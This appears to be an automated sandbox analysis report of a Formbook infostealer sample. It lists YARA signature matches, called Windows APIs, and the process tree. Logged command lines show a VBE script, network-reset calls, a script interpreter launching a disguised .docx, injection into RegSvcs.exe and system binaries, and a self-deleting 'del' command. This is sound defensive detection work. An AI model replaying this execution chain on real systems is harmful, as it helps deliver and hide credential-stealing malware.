              Source: 00000016.00000003.1785086182.0000000000E37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000016.00000003.1785086182.0000000000E37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000016.00000003.1785086182.0000000000E37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000008.00000003.1632126525.0000000001062000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000008.00000003.1632126525.0000000001062000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000008.00000003.1632126525.0000000001062000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0000001B.00000003.1917367387.00000000042CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000001B.00000003.1917367387.00000000042CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0000001B.00000003.1917367387.00000000042CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0000000F.00000002.1666060455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000000F.00000002.1666060455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0000000F.00000002.1666060455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000022.00000003.1993929850.0000000001699000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000022.00000003.1993929850.0000000001699000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000022.00000003.1993929850.0000000001699000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0000001B.00000003.1914324145.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000001B.00000003.1914324145.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0000001B.00000003.1914324145.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000012.00000002.2628367776.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000012.00000002.2628367776.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000012.00000002.2628367776.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0000001B.00000003.1913627559.0000000001A0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000001B.00000003.1913627559.0000000001A0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0000001B.00000003.1913627559.0000000001A0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000012.00000002.2628964763.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000012.00000002.2628964763.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000012.00000002.2628964763.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: Process Memory Space: oxhvi.msc PID: 8084, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: Process Memory Space: RegSvcs.exe PID: 3360, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: Process Memory Space: ipconfig.exe PID: 3780, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: Process Memory Space: rundll32.exe PID: 5336, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: Process Memory Space: oxhvi.msc.exe PID: 7596, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: Process Memory Space: netsh.exe PID: 1508, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: Process Memory Space: netsh.exe PID: 5472, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: Process Memory Space: oxhvi.msc.exe PID: 1796, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: Process Memory Space: cmmon32.exe PID: 2940, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: classification engine | Classification label: mal100.troj.evad.winEXE@1671/57@6/0
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe | Code function: 0_2_00A2932C GetLastError,FormatMessageW,_wcslen,LocalFree | 0_2_00A2932C
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc | Code function: 8_2_0059194F AdjustTokenPrivileges,CloseHandle | 8_2_0059194F
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc | Code function: 8_2_00591F53 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError | 8_2_00591F53
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc | Code function: 8_2_005A5B27 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode | 8_2_005A5B27
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc | Code function: 8_2_0059DC9C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle | 8_2_0059DC9C
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc | Code function: 8_2_005B4089 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear | 8_2_005B4089
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe | Code function: 0_2_00A3EBD3 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree | 0_2_00A3EBD3
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8004:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7980:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7212:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2788:120:WilError_03
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe | File created: C:\Users\user\AppData\Local\Temp\RarSFX0
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe | Command line argument: sfxname | 0_2_00A4454A
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe | Command line argument: sfxstime | 0_2_00A4454A
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe | Command line argument: STARTDLG | 0_2_00A4454A
              Source: M1Y6kc9FpE.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe | File read: C:\Windows\win.ini
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
              Source: M1Y6kc9FpE.exe | ReversingLabs: Detection: 79%
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe | File read: C:\Users\user\Desktop\M1Y6kc9FpE.exe
              Source: unknown | Process created: C:\Users\user\Desktop\M1Y6kc9FpE.exe "C:\Users\user\Desktop\M1Y6kc9FpE.exe"
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\wnrs.vbe"
              Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c oxhvi.msc bvqmcwxut.docx
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc oxhvi.msc bvqmcwxut.docx
              Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc | Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc | Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
              Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"
              Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
              Source: C:\Windows\SysWOW64\ipconfig.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe "C:\Users\user\AppData\Local\Temp\qbmt\OXHVIM~1.EXE" C:\Users\user\AppData\Local\Temp\qbmt\BVQMCW~1.DOC
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe | Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe | Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
              Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"
              Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"
              Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe "C:\Users\user\AppData\Local\Temp\qbmt\OXHVIM~1.EXE" C:\Users\user\AppData\Local\Temp\qbmt\BVQMCW~1.DOC
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe | Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe | Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
              Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\cmmon32.exe "C:\Windows\SysWOW64\cmmon32.exe"
              Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\cmmon32.exe "C:\Windows\SysWOW64\cmmon32.exe"
              Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe "C:\Users\user\AppData\Local\Temp\qbmt\OXHVIM~1.EXE" C:\Users\user\AppData\Local\Temp\qbmt\BVQMCW~1.DOC
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe | Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe | Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
              Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\control.exe "C:\Windows\SysWOW64\control.exe"
              Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\autofmt.exe "C:\Windows\SysWOW64\autofmt.exe"
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\wnrs.vbe" Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c oxhvi.msc bvqmcwxut.docxJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /releaseJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc oxhvi.msc bvqmcwxut.docxJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renewJump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"Jump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"Jump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe "C:\Users\user\AppData\Local\Temp\qbmt\OXHVIM~1.EXE" C:\Users\user\AppData\Local\Temp\qbmt\BVQMCW~1.DOCJump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"Jump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"Jump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe "C:\Users\user\AppData\Local\Temp\qbmt\OXHVIM~1.EXE" C:\Users\user\AppData\Local\Temp\qbmt\BVQMCW~1.DOCJump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe "C:\Windows\SysWOW64\cmmon32.exe"Jump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe "C:\Windows\SysWOW64\cmmon32.exe"Jump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe "C:\Users\user\AppData\Local\Temp\qbmt\OXHVIM~1.EXE" C:\Users\user\AppData\Local\Temp\qbmt\BVQMCW~1.DOCJump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\control.exe "C:\Windows\SysWOW64\control.exe"Jump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autofmt.exe "C:\Windows\SysWOW64\autofmt.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
